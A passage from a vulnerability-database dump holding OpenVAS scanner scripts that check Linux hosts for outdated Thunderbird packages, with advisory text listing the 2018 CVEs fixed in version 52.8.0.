res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hsb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hu\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-hy-am\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-id\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-is\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-it\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ja\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-kab\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ko\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-lt\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nb-no\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-nn-no\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pa-in\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pt-br\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-pt-pt\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-rm\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ro\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ru\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-si\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sq\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-sv-se\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-ta-lk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-tr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-uk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-vi\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-zh-cn\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lightning-l10n-zh-tw\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-dbg\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-dev\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-all\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ar\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ast\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-be\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-bg\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-bn-bd\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-br\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ca\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-cs\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-da\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-de\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-dsb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-el\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-en-gb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-es-ar\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-es-es\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-et\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-eu\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fi\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-fy-nl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ga-ie\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-gd\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-gl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-he\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hsb\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hu\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-hy-am\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-id\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-is\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-it\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ja\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-kab\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ko\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-lt\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nb-no\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nn-no\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pa-in\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pt-br\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pt-pt\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-rm\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ro\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ru\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-si\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sl\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sq\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sv-se\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ta-lk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-tr\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-uk\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-vi\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-zh-cn\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-zh-tw\", ver:\"1:52.8.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "Check the version of thunderbird", "modified": "2019-03-08T00:00:00", "published": "2018-05-30T00:00:00", "id": "OPENVAS:1361412562310882889", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882889", "type": "openvas", "title": "CentOS Update for thunderbird CESA-2018:1725 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2018_1725_thunderbird_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for thunderbird CESA-2018:1725 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882889\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-30 05:46:17 +0200 (Wed, 30 May 2018)\");\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\",\n \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\",\n \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for thunderbird CESA-2018:1725 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of thunderbird\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nThis update upgrades Thunderbird to version 52.8.0.\n\nSecurity Fix(es):\n\n * Mozilla: Memory safety bugs fixed in Firefox 60 and Firefox ESR 52.8\n(CVE-2018-5150)\n\n * Mozilla: Backport critical security fixes in Skia (CVE-2018-5183)\n\n * Mozilla: Use-after-free with SVG animations and clip paths\n(CVE-2018-5154)\n\n * Mozilla: Use-after-free with SVG animations and text paths\n(CVE-2018-5155)\n\n * Mozilla: Integer overflow and out-of-bounds write in Skia (CVE-2018-5159)\n\n * Mozilla: Full plaintext recovery in S/MIME via chosen-ciphertext attack\n(CVE-2018-5184)\n\n * Mozilla: Hang via malformed headers (CVE-2018-5161)\n\n * Mozilla: Encrypted mail leaks plaintext through src attribute\n(CVE-2018-5162)\n\n * Mozilla: Lightweight themes can be installed without user interaction\n(CVE-2018-5168)\n\n * Mozilla: Filename spoofing for external attachments (CVE-2018-5170)\n\n * Mozilla: Buffer overflow during UTF-8 to Unicode string conversion\nthrough legacy extension (CVE-2018-5178)\n\n * Mozilla: Leaking plaintext through HTML forms (CVE-2018-5185)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.\n\nRed Hat would like to thank the Mozilla project for reporting\nCVE-2018-5150, CVE-2018-5154, CVE-2018-5155, CVE-2018-5159, CVE-2018-5168,\nCVE-2018-5178, and CVE-2018-5183. Upstream acknowledges Christoph Diehl,\nRandell Jesup, Tyson Smith, Alex Gaynor, Ronald Crane, Julian Hector,\nKannan Vijayan, Jason Kratzer, Mozilla Developers, Nils, Ivan Fratric,\nWladimir Palant, and Root Object as the original reporters.\");\n script_tag(name:\"affected\", value:\"thunderbird on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"CESA\", value:\"2018:1725\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2018-May/022848.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~52.8.0~1.el7.centos\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-05-26T00:00:00", "id": "OPENVAS:1361412562310843537", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843537", "type": "openvas", "title": "Ubuntu Update for thunderbird USN-3660-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3660_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for thunderbird USN-3660-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843537\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-26 05:44:12 +0200 (Sat, 26 May 2018)\");\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\",\n \"CVE-2018-5168\", \"CVE-2018-5178\", \"CVE-2018-5161\", \"CVE-2018-5162\",\n \"CVE-2018-5170\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for thunderbird USN-3660-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple security issues were discovered in\nThunderbird. If a user were tricked in to opening a specially crafted website in\na browsing context, an attacker could potentially exploit these to cause a denial\nof service via application crash, install lightweight themes without user\ninteraction, or execute arbitrary code. (CVE-2018-5150, CVE-2018-5154,\nCVE-2018-5155, CVE-2018-5159, CVE-2018-5168, CVE-2018-5178)\n\nAn issue was discovered when processing message headers in Thunderbird. If\na user were tricked in to opening a specially crafted message, an attacker\ncould potentially exploit this to cause a denial of service via\napplication hang. (CVE-2018-5161)\n\nIt was discovered encrypted messages could leak plaintext via the src\nattribute of remote images or links. An attacker could potentially exploit\nthis to obtain sensitive information. (CVE-2018-5162)\n\nIt was discovered that the filename of an attachment could be spoofed. An\nattacker could potentially exploit this by tricking the user in to opening\nan attachment of a different type to the one expected. (CVE-2018-5170)\n\nMultiple security issues were discovered in Skia. If a user were tricked\nin to opening a specially crafted message, an attacker could potentially\nexploit these to cause a denial of service via application crash, or\nexecute arbitrary code. (CVE-2018-5183)\n\nIt was discovered that S/MIME encrypted messages with remote content could\nleak plaintext via a chosen-ciphertext attack. An attacker could\npotentially exploit this to obtain sensitive information. (CVE-2018-5184)\n\nIt was discovered that plaintext of decrypted emails could leak by\nsubmitting an embedded form. An attacker could potentially exploit this to\nobtain sensitive information. (CVE-2018-5185)\");\n script_tag(name:\"affected\", value:\"thunderbird on Ubuntu 18.04 LTS,\n Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3660-1\");\n script_xref(name:\"URL\", value:\"https://usn.ubuntu.com/3660-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:52.8.0+build1-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:52.8.0+build1-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:52.8.0+build1-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"1:52.8.0+build1-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-04T16:46:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5150", "CVE-2018-5178", "CVE-2018-5162", "CVE-2018-5155", "CVE-2018-5170", "CVE-2018-5183", "CVE-2018-5185", "CVE-2018-5154", "CVE-2018-5174", "CVE-2018-5168", "CVE-2018-5161", "CVE-2018-5184", "CVE-2018-5159"], "description": "The remote host is missing an update for the ", "modified": "2020-06-03T00:00:00", "published": "2018-05-21T00:00:00", "id": "OPENVAS:1361412562310851753", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851753", "type": "openvas", "title": "openSUSE: Security Advisory for Mozilla (openSUSE-SU-2018:1361-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851753\");\n script_version(\"2020-06-03T08:38:58+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-03 08:38:58 +0000 (Wed, 03 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-05-21 05:00:55 +0200 (Mon, 21 May 2018)\");\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\",\n \"CVE-2018-5161\", 